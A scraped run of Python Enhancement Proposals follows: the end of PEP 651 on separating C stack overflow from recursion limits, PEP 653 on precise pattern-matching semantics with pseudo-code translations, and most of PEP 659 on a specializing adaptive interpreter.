By separating the checks for C stack overflow from checks for recursion depth,
pure Python programs can run safely, using whatever level of recursion they require.
Rationale
CPython currently relies on a single limit to guard against potentially dangerous stack overflow
in the virtual machine and to guard against run away recursion in the Python program.
This is a consequence of the implementation which couples the C and Python call stacks.
By breaking this coupling, we can improve both the usability of CPython and its safety.
The recursion limit exists to protect against runaway recursion, the integrity of the virtual machine should not depend on it.
Similarly, recursion should not be limited by implementation details.
Specification
Two new exception classes will be added, StackOverflow and RecursionOverflow, both of which will be
sub-classes of RecursionError
StackOverflow exception
A StackOverflow exception will be raised whenever the interpreter or builtin module code
determines that the C stack is at or nearing a limit of safety.
StackOverflow is a sub-class of RecursionError,
so any code that handles RecursionError will handle StackOverflow
RecursionOverflow exception
A RecursionOverflow exception will be raised when a call to a Python function
causes the recursion limit to be exceeded.
This is a slight change from current behavior which raises a RecursionError.
RecursionOverflow is a sub-class of RecursionError,
so any code that handles RecursionError will continue to work as before.
Decoupling the Python stack from the C stack
In order to provide the above guarantees and ensure that any program that worked previously
continues to do so, the Python and C stack will need to be separated.
That is, calls to Python functions from Python functions, should not consume space on the C stack.
Calls to and from builtin functions will continue to consume space on the C stack.
The size of the C stack will be implementation defined, and may vary from machine to machine.
It may even differ between threads. However, there is an expectation that any code that could run
with the recursion limit set to the previous default value, will continue to run.
Many operations in Python perform some sort of call at the C level.
Most of these will continue to consume C stack, and will result in a
StackOverflow exception if uncontrolled recursion occurs.
Other Implementations
Other implementations are required to fail safely regardless of what value the recursion limit is set to.
If the implementation couples the Python stack to the underlying VM or hardware stack,
then it should raise a RecursionOverflow exception when the recursion limit is exceeded,
but the underlying stack does not overflow.
If the underlying stack overflows, or is near to overflow,
then a StackOverflow exception should be raised.
C-API
A new function, Py_CheckStackDepth() will be added, and the behavior of Py_EnterRecursiveCall() will be modified slightly.
Py_CheckStackDepth()
int Py_CheckStackDepth(const char *where)
will return 0 if there is no immediate danger of C stack overflow.
It will return -1 and set an exception, if the C stack is near to overflowing.
The where parameter is used in the exception message, in the same fashion
as the where parameter of Py_EnterRecursiveCall().
Py_EnterRecursiveCall()
Py_EnterRecursiveCall() will be modified to call Py_CheckStackDepth() before performing its current function.
PyLeaveRecursiveCall()
Py_LeaveRecursiveCall() will remain unchanged.
Backwards Compatibility
This feature is fully backwards compatible at the Python level.
Some low-level tools, such as machine-code debuggers, will need to be modified.
For example, the gdb scripts for Python will need to be aware that there may be more than one Python frame
per C frame.
C code that uses the Py_EnterRecursiveCall(), PyLeaveRecursiveCall() pair of
functions will continue to work correctly. In addition, Py_EnterRecursiveCall()
may raise a StackOverflow exception.
New code should use the Py_CheckStackDepth() function, unless the code wants to
count as a Python function call with regard to the recursion limit.
We recommend that “python-like” code, such as Cython-generated functions,
use Py_EnterRecursiveCall(), but other code use Py_CheckStackDepth().
Security Implications
It will no longer be possible to crash the CPython virtual machine through recursion.
Performance Impact
It is unlikely that the performance impact will be significant.
The additional logic required will probably have a very small negative impact on performance.
The improved locality of reference from reduced C stack use should have some small positive impact.
It is hard to predict whether the overall effect will be positive or negative,
but it is quite likely that the net effect will be too small to be measured.
Implementation
Monitoring C stack consumption
Gauging whether a C stack overflow is imminent is difficult. So we need to be conservative.
We need to determine a safe bounds for the stack, which is not something possible in portable C code.
For major platforms, the platform specific API will be used to provide an accurate stack bounds.
However, for minor platforms some amount of guessing may be required.
While this might sound bad, it is no worse than the current situation, where we guess that the
size of the C stack is at least 1000 times the stack space required for the chain of calls from
_PyEval_EvalFrameDefault to _PyEval_EvalFrameDefault.
This means that in some cases the amount of recursion possible may be reduced.
In general, however, the amount of recursion possible should be increased, as many calls will use no C stack.
Our general approach to determining a limit for the C stack is to get an address within the current C frame,
as early as possible in the call chain. The limit can then be guessed by adding some constant to that.
Making Python-to-Python calls without consuming the C stack
Calls in the interpreter are handled by the CALL_FUNCTION,
CALL_FUNCTION_KW, CALL_FUNCTION_EX and CALL_METHOD instructions.
The code for those instructions will be modified so that when
a Python function or method is called, instead of making a call in C,
the interpreter will setup the callee’s frame and continue interpretation as normal.
The RETURN_VALUE instruction will perform the reverse operation,
except when the current frame is the entry frame of the interpreter
when it will return as normal.
Rejected Ideas
None, as yet.
Open Issues
None, as yet.
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Rejected | PEP 651 – Robust Stack Overflow Handling | Standards Track | This PEP proposes that Python should treat machine stack overflow differently from runaway recursion. |
PEP 653 – Precise Semantics for Pattern Matching
Author:
Mark Shannon <mark at hotpy.org>
Status:
Draft
Type:
Standards Track
Created:
09-Feb-2021
Post-History:
18-Feb-2021
Table of Contents
Abstract
Motivation
Precise semantics
Improved control over class matching
Robustness
Efficient implementation
Rationale
Specification
Additions to the object model
Semantics of the matching process
Preamble
Capture patterns
Wildcard patterns
Literal Patterns
Value Patterns
Sequence Patterns
Mapping Patterns
Class Patterns
Nested patterns
Guards
Non-conforming special attributes
Values of the special attributes for classes in the standard library
Legal optimizations
Security Implications
Implementation
Possible optimizations
Splitting evaluation into lanes
Sequence patterns
Mapping patterns
Summary of differences between this PEP and PEP 634
Rejected Ideas
Using attributes from the instance’s dictionary
Lookup of __match_args__ on the subject not the pattern
Combining __match_class__ and __match_container__ into a single value
Deferred Ideas
Having a separate value to reject all class matches
Code examples
Copyright
Abstract
This PEP proposes a semantics for pattern matching that respects the general concept of PEP 634,
but is more precise, easier to reason about, and should be faster.
The object model will be extended with two special (dunder) attributes, __match_container__ and
__match_class__, in addition to the __match_args__ attribute from PEP 634, to support pattern matching.
Both of these new attributes must be integers and __match_args__ is required to be a tuple of unique strings.
With this PEP:
The semantics of pattern matching will be clearer, so that patterns are easier to reason about.
It will be possible to implement pattern matching in a more efficient fashion.
Pattern matching will be more usable for complex classes, by allowing classes some more control over which patterns they match.
Motivation
Pattern matching in Python, as described in PEP 634, is to be added to Python 3.10.
Unfortunately, PEP 634 is not as precise about the semantics as it could be,
nor does it allow classes sufficient control over how they match patterns.
Precise semantics
PEP 634 explicitly includes a section on undefined behavior.
Large amounts of undefined behavior may be acceptable in a language like C,
but in Python it should be kept to a minimum.
Pattern matching in Python can be defined more precisely without losing expressiveness or performance.
Improved control over class matching
PEP 634 delegates the decision over whether a class is a sequence or mapping to collections.abc.
Not all classes that could be considered sequences are registered as subclasses of collections.abc.Sequence.
This PEP allows them to match sequence patterns, without the full collections.abc.Sequence machinery.
PEP 634 privileges some builtin classes with a special form of matching, the “self” match.
For example the pattern list(x) matches a list and assigns the list to x.
By allowing classes to choose which kinds of pattern they match, other classes can use this form as well.
For example, using sympy, we might want to write:
# a*a == a**2
case Mul(args=[Symbol(a), Symbol(b)]) if a == b:
return Pow(a, 2)
Which requires the sympy class Symbol to “self” match.
For sympy to support this pattern with PEP 634 is possible, but a bit tricky.
With this PEP it can be implemented very easily [1].
Robustness
With this PEP, access to attributes during pattern matching becomes well defined and deterministic.
This makes pattern matching less error prone when matching objects with hidden side effects, such as object-relational mappers.
Objects will have more control over their own deconstruction, which can help prevent unintended consequences should attribute access have side-effects.
PEP 634 relies on the collections.abc module when determining which patterns a value can match, implicitly importing it if necessary.
This PEP will eliminate surprising import errors and misleading audit events from those imports.
Efficient implementation
The semantics proposed in this PEP will allow efficient implementation, partly as a result of having precise semantics
and partly from using the object model.
With precise semantics, it is possible to reason about what code transformations are correct,
and thus apply optimizations effectively.
Because the object model is a core part of Python, implementations already handle special attribute lookup efficiently.
Looking up a special attribute is much faster than performing a subclass test on an abstract base class.
Rationale
The object model and special methods are at the core of the Python language. Consequently,
implementations support them well.
Using special attributes for pattern matching allows pattern matching to be implemented in a way that
integrates well with the rest of the implementation, and is thus easier to maintain and is likely to perform better.
A match statement performs a sequence of pattern matches. In general, matching a pattern has three parts:
Can the value match this kind of pattern?
When deconstructed, does the value match this particular pattern?
Is the guard true?
To determine whether a value can match a particular kind of pattern, we add the __match_container__
and __match_class__ attributes.
This allows the kind of a value to be determined in a efficient fashion.
Specification
Additions to the object model
The __match_container__ and __match_class__ attributes will be added to object.
__match_container__ should be overridden by classes that want to match mapping or sequence patterns.
__match_class__ should be overridden by classes that want to change the default behavior when matching class patterns.
__match_container__ must be an integer and should be exactly one of these:
0
MATCH_SEQUENCE = 1
MATCH_MAPPING = 2
MATCH_SEQUENCE is used to indicate that instances of the class can match sequence patterns.
MATCH_MAPPING is used to indicate that instances of the class can match mapping patterns.
__match_class__ must be an integer and should be exactly one of these:
0
MATCH_SELF = 8
MATCH_SELF is used to indicate that for a single positional argument class pattern, the subject will be used and not deconstructed.
Note
In the rest of this document, we will refer to the above values by name only.
Symbolic constants will be provided both for Python and C, and the values will
never be changed.
object will have the following values for the special attributes:
__match_container__ = 0
__match_class__= 0
__match_args__ = ()
These special attributes will be inherited as normal.
If __match_args__ is overridden, then it is required to hold a tuple of unique strings. It may be empty.
Note
__match_args__ will be automatically generated for dataclasses and named tuples, as specified in PEP 634.
The pattern matching implementation is not required to check that any of these attributes behave as specified.
If the value of __match_container__, __match_class__ or __match_args__ is not as specified, then
the implementation may raise any exception, or match the wrong pattern.
Of course, implementations are free to check these properties and provide meaningful error messages if they can do so efficiently.
Semantics of the matching process
In the following, all variables of the form $var are temporary variables and are not visible to the Python program.
They may be visible via introspection, but that is an implementation detail and should not be relied on.
The pseudo-statement FAIL is used to signify that matching failed for this pattern and that matching should move to the next pattern.
If control reaches the end of the translation without reaching a FAIL, then it has matched, and following patterns are ignored.
Variables of the form $ALL_CAPS are meta-variables holding a syntactic element, they are not normal variables.
So, $VARS = $items is not an assignment of $items to $VARS,
but an unpacking of $items into the variables that $VARS holds.
For example, with the abstract syntax case [$VARS]:, and the concrete syntax case[a, b]: then $VARS would hold the variables (a, b),
not the values of those variables.
The pseudo-function QUOTE takes a variable and returns the name of that variable.
For example, if the meta-variable $VAR held the variable foo then QUOTE($VAR) == "foo".
All additional code listed below that is not present in the original source will not trigger line events, conforming to PEP 626.
Preamble
Before any patterns are matched, the expression being matched is evaluated:
match expr:
translates to:
$value = expr
Capture patterns
Capture patterns always match, so the irrefutable match:
case capture_var:
translates to:
capture_var = $value
Wildcard patterns
Wildcard patterns always match, so:
case _:
translates to:
# No code -- Automatically matches
Literal Patterns
The literal pattern:
case LITERAL:
translates to:
if $value != LITERAL:
FAIL
except when the literal is one of None, True or False ,
when it translates to:
if $value is not LITERAL:
FAIL
Value Patterns
The value pattern:
case value.pattern:
translates to:
if $value != value.pattern:
FAIL
Sequence Patterns
A pattern not including a star pattern:
case [$VARS]:
translates to:
$kind = type($value).__match_container__
if $kind != MATCH_SEQUENCE:
FAIL
if len($value) != len($VARS):
FAIL
$VARS = $value
Example: [2]
A pattern including a star pattern:
case [$VARS]
translates to:
$kind = type($value).__match_container__
if $kind != MATCH_SEQUENCE:
FAIL
if len($value) < len($VARS):
FAIL
$VARS = $value # Note that $VARS includes a star expression.
Example: [3]
Mapping Patterns
A pattern not including a double-star pattern:
case {$KEYWORD_PATTERNS}:
translates to:
$sentinel = object()
$kind = type($value).__match_container__
if $kind != MATCH_MAPPING:
FAIL
# $KEYWORD_PATTERNS is a meta-variable mapping names to variables.
for $KEYWORD in $KEYWORD_PATTERNS:
$tmp = $value.get(QUOTE($KEYWORD), $sentinel)
if $tmp is $sentinel:
FAIL
$KEYWORD_PATTERNS[$KEYWORD] = $tmp
Example: [4]
A pattern including a double-star pattern:
case {$KEYWORD_PATTERNS, **$DOUBLE_STARRED_PATTERN}:
translates to:
$kind = type($value).__match_container__
if $kind != MATCH_MAPPING:
FAIL
# $KEYWORD_PATTERNS is a meta-variable mapping names to variables.
$tmp = dict($value)
if not $tmp.keys() >= $KEYWORD_PATTERNS.keys():
FAIL:
for $KEYWORD in $KEYWORD_PATTERNS:
$KEYWORD_PATTERNS[$KEYWORD] = $tmp.pop(QUOTE($KEYWORD))
$DOUBLE_STARRED_PATTERN = $tmp
Example: [5]
Class Patterns
Class pattern with no arguments:
case ClsName():
translates to:
if not isinstance($value, ClsName):
FAIL
Class pattern with a single positional pattern:
case ClsName($VAR):
translates to:
$kind = type($value).__match_class__
if $kind == MATCH_SELF:
if not isinstance($value, ClsName):
FAIL
$VAR = $value
else:
As other positional-only class pattern
Positional-only class pattern:
case ClsName($VARS):
translates to:
if not isinstance($value, ClsName):
FAIL
$attrs = ClsName.__match_args__
if len($attr) < len($VARS):
raise TypeError(...)
try:
for i, $VAR in enumerate($VARS):
$VAR = getattr($value, $attrs[i])
except AttributeError:
FAIL
Example: [6]
Class patterns with all keyword patterns:
case ClsName($KEYWORD_PATTERNS):
translates to:
if not isinstance($value, ClsName):
FAIL
try:
for $KEYWORD in $KEYWORD_PATTERNS:
$tmp = getattr($value, QUOTE($KEYWORD))
$KEYWORD_PATTERNS[$KEYWORD] = $tmp
except AttributeError:
FAIL
Example: [7]
Class patterns with positional and keyword patterns:
case ClsName($VARS, $KEYWORD_PATTERNS):
translates to:
if not isinstance($value, ClsName):
FAIL
$attrs = ClsName.__match_args__
if len($attr) < len($VARS):
raise TypeError(...)
$pos_attrs = $attrs[:len($VARS)]
try:
for i, $VAR in enumerate($VARS):
$VAR = getattr($value, $attrs[i])
for $KEYWORD in $KEYWORD_PATTERNS:
$name = QUOTE($KEYWORD)
if $name in pos_attrs:
raise TypeError(...)
$KEYWORD_PATTERNS[$KEYWORD] = getattr($value, $name)
except AttributeError:
FAIL
Example: [8]
Nested patterns
The above specification assumes that patterns are not nested. For nested patterns
the above translations are applied recursively by introducing temporary capture patterns.
For example, the pattern:
case [int(), str()]:
translates to:
$kind = type($value).__match_class__
if $kind != MATCH_SEQUENCE:
FAIL
if len($value) != 2:
FAIL
$value_0, $value_1 = $value
#Now match on temporary values
if not isinstance($value_0, int):
FAIL
if not isinstance($value_1, str):
FAIL
Guards
Guards translate to a test following the rest of the translation:
case pattern if guard:
translates to:
[translation for pattern]
if not guard:
FAIL
Non-conforming special attributes
All classes should ensure that the the values of __match_container__, __match_class__
and __match_args__ follow the specification.
Therefore, implementations can assume, without checking, that the following are true:
__match_container__ == 0 or __match_container__ == MATCH_SEQUENCE or __match_container__ == MATCH_MAPPING
__match_class__ == 0 or __match_class__ == MATCH_SELF
and that __match_args__ is a tuple of unique strings.
Values of the special attributes for classes in the standard library
For the core builtin container classes __match_container__ will be:
list: MATCH_SEQUENCE
tuple: MATCH_SEQUENCE
dict: MATCH_MAPPING
bytearray: 0
bytes: 0
str: 0
Named tuples will have __match_container__ set to MATCH_SEQUENCE.
All other standard library classes for which issubclass(cls, collections.abc.Mapping) is true will have __match_container__ set to MATCH_MAPPING.
All other standard library classes for which issubclass(cls, collections.abc.Sequence) is true will have __match_container__ set to MATCH_SEQUENCE.
For the following builtin classes __match_class__ will be set to MATCH_SELF:
bool
bytearray
bytes
float
frozenset
int
set
str
list
tuple
dict
Legal optimizations
The above semantics implies a lot of redundant effort and copying in the implementation.
However, it is possible to implement the above semantics efficiently by employing semantic preserving transformations
on the naive implementation.
When performing matching, implementations are allowed
to treat the following functions and methods as pure:
For any class supporting MATCH_SEQUENCE:
* ``cls.__len__()``
* ``cls.__getitem__()``
For any class supporting MATCH_MAPPING:
* ``cls.get()`` (Two argument form only)
Implementations are allowed to make the following assumptions:
isinstance(obj, cls) can be freely replaced with issubclass(type(obj), cls) and vice-versa.
isinstance(obj, cls) will always return the same result for any (obj, cls) pair and repeated calls can thus be elided.
Reading any of __match_container__, __match_class__ or __match_args__ is a pure operation, and may be cached.
Sequences, that is any class for which __match_container__ == MATCH_SEQUENCE is not zero, are not modified by iteration, subscripting or calls to len().
Consequently, those operations can be freely substituted for each other where they would be equivalent when applied to an immutable sequence.
Mappings, that is any class for which __match_container__ == MATCH_MAPPING is not zero, will not capture the second argument of the get() method.
So, the $sentinel value may be freely re-used.
In fact, implementations are encouraged to make these assumptions, as it is likely to result in significantly better performance.
Security Implications
None.
Implementation
The naive implementation that follows from the specification will not be very efficient.
Fortunately, there are some reasonably straightforward transformations that can be used to improve performance.
Performance should be comparable to the implementation of PEP 634 (at time of writing) by the release of 3.10.
Further performance improvements may have to wait for the 3.11 release.
Possible optimizations
The following is not part of the specification,
but guidelines to help developers create an efficient implementation.
Splitting evaluation into lanes
Since the first step in matching each pattern is check to against the kind, it is possible to combine all the checks against kind into a single multi-way branch at the beginning
of the match. The list of cases can then be duplicated into several “lanes” each corresponding to one kind.
It is then trivial to remove unmatchable cases from each lane.
Depending on the kind, different optimization strategies are possible for each lane.
Note that the body of the match clause does not need to be duplicated, just the pattern.
Sequence patterns
This is probably the most complex to optimize and the most profitable in terms of performance.
Since each pattern can only match a range of lengths, often only a single length,
the sequence of tests can be rewritten in as an explicit iteration over the sequence,
attempting to match only those patterns that apply to that sequence length.
For example:
case []:
A
case [x]:
B
case [x, y]:
C
case other:
D
Can be compiled roughly as:
# Choose lane
$i = iter($value)
for $0 in $i:
break
else:
A
goto done
for $1 in $i:
break
else:
x = $0
B
goto done
for $2 in $i:
del $0, $1, $2
break
else:
x = $0
y = $1
C
goto done
other = $value
D
done:
Mapping patterns
The best strategy here is probably to form a decision tree based on the size of the mapping and which keys are present.
There is no point repeatedly testing for the presence of a key.
For example:
match obj:
case {a:x, b:y}:
W
case {a:x, c:y}:
X
case {a:x, b:_, c:y}:
Y
case other:
Z
If the key "a" is not present when checking for case X, there is no need to check it again for Y.
The mapping lane can be implemented, roughly as:
# Choose lane
if len($value) == 2:
if "a" in $value:
if "b" in $value:
x = $value["a"]
y = $value["b"]
goto W
if "c" in $value:
x = $value["a"]
y = $value["c"]
goto X
elif len($value) == 3:
if "a" in $value and "b" in $value:
x = $value["a"]
y = $value["c"]
goto Y
other = $value
goto Z
Summary of differences between this PEP and PEP 634
The changes to the semantics can be summarized as:
Requires __match_args__ to be a tuple of strings, not just a sequence.
This make pattern matching a bit more robust and optimizable as __match_args__ can be assumed to be immutable.
Selecting the kind of container patterns that can be matched uses cls.__match_container__ instead of
issubclass(cls, collections.abc.Mapping) and issubclass(cls, collections.abc.Sequence).
Allows classes to opt out of deconstruction altogether, if necessary, but setting __match_class__ = 0.
The behavior when matching patterns is more precisely defined, but is otherwise unchanged.
There are no changes to syntax. All examples given in the PEP 636 tutorial should continue to work as they do now.
Rejected Ideas
Using attributes from the instance’s dictionary
An earlier version of this PEP only used attributes from the instance’s dictionary when matching a class pattern with __match_class__ was the default value.
The intent was to avoid capturing bound-methods and other synthetic attributes. However, this also mean that properties were ignored.
For the class:
class C:
def __init__(self):
self.a = "a"
@property
def p(self):
...
def m(self):
...
Ideally we would match the attributes “a” and “p”, but not “m”.
However, there is no general way to do that, so this PEP now follows the semantics of PEP 634.
Lookup of __match_args__ on the subject not the pattern
An earlier version of this PEP looked up __match_args__ on the class of the subject and
not the class specified in the pattern.
This has been rejected for a few reasons:
* Using the class specified in the pattern is more amenable to optimization and can offer better performance.
* Using the class specified in the pattern has the potential to provide better error reporting is some cases.
* Neither approach is perfect, both have odd corner cases. Keeping the status quo minimizes disruption.
Combining __match_class__ and __match_container__ into a single value
An earlier version of this PEP combined __match_class__ and __match_container__ into a single value, __match_kind__.
Using a single value has a small advantage in terms of performance,
but is likely to result in unintended changes to container matching when overriding class matching behavior, and vice versa.
Deferred Ideas
The original version of this PEP included the match kind MATCH_POSITIONAL and special method
__deconstruct__ which would allow classes full control over their matching. This is important
for libraries like sympy.
For example, using sympy, we might want to write:
# sin(x)**2 + cos(x)**2 == 1
case Add(Pow(sin(a), 2), Pow(cos(b), 2)) if a == b:
return 1
For sympy to support the positional patterns with current pattern matching is possible,
but is tricky. With these additional features it can be implemented easily [9].
This idea will feature in a future PEP for 3.11.
However, it is too late in the 3.10 development cycle for such a change.
Having a separate value to reject all class matches
In an earlier version of this PEP, there was a distinct value for __match_class__ that allowed classes to not match any class
pattern that would have required deconstruction. However, this would become redundant once MATCH_POSITIONAL is introduced, and
complicates the specification for an extremely rare case.
Code examples
[1]
class Symbol:
__match_class__ = MATCH_SELF
[2]
This:
case [a, b] if a is b:
translates to:
$kind = type($value).__match_container__
if $kind != MATCH_SEQUENCE:
FAIL
if len($value) != 2:
FAIL
a, b = $value
if not a is b:
FAIL
[3]
This:
case [a, *b, c]:
translates to:
$kind = type($value).__match_container__
if $kind != MATCH_SEQUENCE:
FAIL
if len($value) < 2:
FAIL
a, *b, c = $value
[4]
This:
case {"x": x, "y": y} if x > 2:
translates to:
$kind = type($value).__match_container__
if $kind != MATCH_MAPPING:
FAIL
$tmp = $value.get("x", $sentinel)
if $tmp is $sentinel:
FAIL
x = $tmp
$tmp = $value.get("y", $sentinel)
if $tmp is $sentinel:
FAIL
y = $tmp
if not x > 2:
FAIL
[5]
This:
case {"x": x, "y": y, **z}:
translates to:
$kind = type($value).__match_container__
if $kind != MATCH_MAPPING:
FAIL
$tmp = dict($value)
if not $tmp.keys() >= {"x", "y"}:
FAIL
x = $tmp.pop("x")
y = $tmp.pop("y")
z = $tmp
[6]
This:
match ClsName(x, y):
translates to:
if not isinstance($value, ClsName):
FAIL
$attrs = ClsName.__match_args__
if len($attr) < 2:
FAIL
try:
x = getattr($value, $attrs[0])
y = getattr($value, $attrs[1])
except AttributeError:
FAIL
[7]
This:
match ClsName(a=x, b=y):
translates to:
if not isinstance($value, ClsName):
FAIL
try:
x = $value.a
y = $value.b
except AttributeError:
FAIL
[8]
This:
match ClsName(x, a=y):
translates to:
if not isinstance($value, ClsName):
FAIL
$attrs = ClsName.__match_args__
if len($attr) < 1:
raise TypeError(...)
$positional_names = $attrs[:1]
try:
x = getattr($value, $attrs[0])
if "a" in $positional_names:
raise TypeError(...)
y = $value.a
except AttributeError:
FAIL
[9]
class Basic:
__match_class__ = MATCH_POSITIONAL
def __deconstruct__(self):
return self._args
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Draft | PEP 653 – Precise Semantics for Pattern Matching | Standards Track | This PEP proposes a semantics for pattern matching that respects the general concept of PEP 634,
but is more precise, easier to reason about, and should be faster. |
PEP 659 – Specializing Adaptive Interpreter
Author:
Mark Shannon <mark at hotpy.org>
Status:
Draft
Type:
Informational
Created:
13-Apr-2021
Post-History:
11-May-2021
Table of Contents
Abstract
Motivation
Rationale
Performance
Implementation
Overview
Quickening
Adaptive instructions
Specialization
Ancillary data
Example families of instructions
LOAD_ATTR
LOAD_GLOBAL
Compatibility
Costs
Memory use
Comparing memory use to 3.10
Security Implications
Rejected Ideas
Storing data caches before the bytecode.
References
Copyright
Abstract
In order to perform well, virtual machines for dynamic languages must
specialize the code that they execute to the types and values in the
program being run. This specialization is often associated with “JIT”
compilers, but is beneficial even without machine code generation.
A specializing, adaptive interpreter is one that speculatively specializes
on the types or values it is currently operating on, and adapts to changes
in those types and values.
Specialization gives us improved performance, and adaptation allows the
interpreter to rapidly change when the pattern of usage in a program alters,
limiting the amount of additional work caused by mis-specialization.
This PEP proposes using a specializing, adaptive interpreter that specializes
code aggressively, but over a very small region, and is able to adjust to
mis-specialization rapidly and at low cost.
Adding a specializing, adaptive interpreter to CPython will bring significant
performance improvements. It is hard to come up with meaningful numbers,
as it depends very much on the benchmarks and on work that has not yet happened.
Extensive experimentation suggests speedups of up to 50%.
Even if the speedup were only 25%, this would still be a worthwhile enhancement.
Motivation
Python is widely acknowledged as slow.
Whilst Python will never attain the performance of low-level languages like C,
Fortran, or even Java, we would like it to be competitive with fast
implementations of scripting languages, like V8 for Javascript or luajit for
lua.
Specifically, we want to achieve these performance goals with CPython to
benefit all users of Python including those unable to use PyPy or
other alternative virtual machines.
Achieving these performance goals is a long way off, and will require a lot of
engineering effort, but we can make a significant step towards those goals by
speeding up the interpreter.
Both academic research and practical implementations have shown that a fast
interpreter is a key part of a fast virtual machine.
Typical optimizations for virtual machines are expensive, so a long “warm up”
time is required to gain confidence that the cost of optimization is justified.
In order to get speed-ups rapidly, without noticeable warmup times,
the VM should speculate that specialization is justified even after a few
executions of a function. To do that effectively, the interpreter must be able
to optimize and de-optimize continually and very cheaply.
By using adaptive and speculative specialization at the granularity of
individual virtual machine instructions,
we get a faster interpreter that also generates profiling information
for more sophisticated optimizations in the future.
Rationale
There are many practical ways to speed-up a virtual machine for a dynamic
language.
However, specialization is the most important, both in itself and as an
enabler of other optimizations.
Therefore it makes sense to focus our efforts on specialization first,
if we want to improve the performance of CPython.
Specialization is typically done in the context of a JIT compiler,
but research shows specialization in an interpreter can boost performance
significantly, even outperforming a naive compiler [1].
There have been several ways of doing this proposed in the academic
literature, but most attempt to optimize regions larger than a
single bytecode [1] [2].
Using larger regions than a single instruction requires code to handle
de-optimization in the middle of a region.
Specialization at the level of individual bytecodes makes de-optimization
trivial, as it cannot occur in the middle of a region.
By speculatively specializing individual bytecodes, we can gain significant
performance improvements without anything but the most local,
and trivial to implement, de-optimizations.
The closest approach to this PEP in the literature is
“Inline Caching meets Quickening” [3].
This PEP has the advantages of inline caching,
but adds the ability to quickly de-optimize making the performance
more robust in cases where specialization fails or is not stable.
Performance
The speedup from specialization is hard to determine, as many specializations
depend on other optimizations. Speedups seem to be in the range 10% - 60%.
Most of the speedup comes directly from specialization. The largest
contributors are speedups to attribute lookup, global variables, and calls.
A small, but useful, fraction is from improved dispatch such as
super-instructions and other optimizations enabled by quickening.
Implementation
Overview
Any instruction that would benefit from specialization will be replaced by an
“adaptive” form of that instruction. When executed, the adaptive instructions
will specialize themselves in response to the types and values that they see.
This process is known as “quickening”.
Once an instruction in a code object has executed enough times,
that instruction will be “specialized” by replacing it with a new instruction
that is expected to execute faster for that operation.
Quickening
Quickening is the process of replacing slow instructions with faster variants.
Quickened code has a number of advantages over immutable bytecode:
It can be changed at runtime.
It can use super-instructions that span lines and take multiple operands.
It does not need to handle tracing as it can fallback to the original
bytecode for that.
In order that tracing can be supported, the quickened instruction format
should match the immutable, user visible, bytecode format:
16-bit instructions of 8-bit opcode followed by 8-bit operand.
Adaptive instructions
Each instruction that would benefit from specialization is replaced by an
adaptive version during quickening. For example,
the LOAD_ATTR instruction would be replaced with LOAD_ATTR_ADAPTIVE.
Each adaptive instruction periodically attempts to specialize itself.
Specialization
CPython bytecode contains many instructions that represent high-level
operations, and would benefit from specialization. Examples include CALL,
LOAD_ATTR, LOAD_GLOBAL and BINARY_ADD.
By introducing a “family” of specialized instructions for each of these
instructions allows effective specialization,
since each new instruction is specialized to a single task.
Each family will include an “adaptive” instruction, that maintains a counter
and attempts to specialize itself when that counter reaches zero.
Each family will also include one or more specialized instructions that
perform the equivalent of the generic operation much faster provided their
inputs are as expected.
Each specialized instruction will maintain a saturating counter which will
be incremented whenever the inputs are as expected. Should the inputs not
be as expected, the counter will be decremented and the generic operation
will be performed.
If the counter reaches the minimum value, the instruction is de-optimized by
simply replacing its opcode with the adaptive version.
Ancillary data
Most families of specialized instructions will require more information than
can fit in an 8-bit operand. To do this, a number of 16 bit entries immediately
following the instruction are used to store this data. This is a form of inline
cache, an “inline data cache”. Unspecialized, or adaptive, instructions will
use the first entry of this cache as a counter, and simply skip over the others.
Example families of instructions
LOAD_ATTR
The LOAD_ATTR instruction loads the named attribute of the object on top of the stack,
then replaces the object on top of the stack with the attribute.
This is an obvious candidate for specialization. Attributes might belong to
a normal instance, a class, a module, or one of many other special cases.
LOAD_ATTR would initially be quickened to LOAD_ATTR_ADAPTIVE which
would track how often it is executed, and call the _Py_Specialize_LoadAttr
internal function when executed enough times, or jump to the original
LOAD_ATTR instruction to perform the load. When optimizing, the kind
of the attribute would be examined, and if a suitable specialized instruction
was found, it would replace LOAD_ATTR_ADAPTIVE in place.
Specialization for LOAD_ATTR might include:
LOAD_ATTR_INSTANCE_VALUE A common case where the attribute is stored in
the object’s value array, and not shadowed by an overriding descriptor.
LOAD_ATTR_MODULE Load an attribute from a module.
LOAD_ATTR_SLOT Load an attribute from an object whose
class defines __slots__.
Note how this allows optimizations that complement other optimizations.
The LOAD_ATTR_INSTANCE_VALUE works well with the “lazy dictionary” used for
many objects.
LOAD_GLOBAL
The LOAD_GLOBAL instruction looks up a name in the global namespace
and then, if not present in the global namespace,
looks it up in the builtins namespace.
In 3.9 the C code for the LOAD_GLOBAL includes code to check to see
whether the whole code object should be modified to add a cache,
whether either the global or builtins namespace,
code to lookup the value in a cache, and fallback code.
This makes it complicated and bulky.
It also performs many redundant operations even when supposedly optimized.
Using a family of instructions makes the code more maintainable and faster,
as each instruction only needs to handle one concern.
Specializations would include:
LOAD_GLOBAL_ADAPTIVE would operate like LOAD_ATTR_ADAPTIVE above.
LOAD_GLOBAL_MODULE can be specialized for the case where the value is in
the globals namespace. After checking that the keys of the namespace have
not changed, it can load the value from the stored index.
LOAD_GLOBAL_BUILTIN can be specialized for the case where the value is
in the builtins namespace. It needs to check that the keys of the global
namespace have not been added to, and that the builtins namespace has not
changed. Note that we don’t care if the values of the global namespace
have changed, just the keys.
See [4] for a full implementation.
Note
This PEP outlines the mechanisms for managing specialization, and does not
specify the particular optimizations to be applied.
It is likely that details, or even the entire implementation, may change
as the code is further developed.
Compatibility
There will be no change to the language, library or API.
The only way that users will be able to detect the presence of the new
interpreter is through timing execution, the use of debugging tools,
or measuring memory use.
Costs
Memory use
An obvious concern with any scheme that performs any sort of caching is
“how much more memory does it use?”.
The short answer is “not that much”.
Comparing memory use to 3.10
CPython 3.10 used 2 bytes per instruction, until the execution count
reached ~2000 when it allocates another byte per instruction and
32 bytes per instruction with a cache (LOAD_GLOBAL and LOAD_ATTR).
The following table shows the additional bytes per instruction to support the
3.10 opcache or the proposed adaptive interpreter, on a 64 bit machine.
Version
3.10 cold
3.10 hot
3.11
Specialised
0%
~15%
~25%
code
2
2
2
opcache_map
0
1
0
opcache/data
0
4.8
4
Total
2
7.8
6
3.10 cold is before the code has reached the ~2000 limit.
3.10 hot shows the cache use once the threshold is reached.
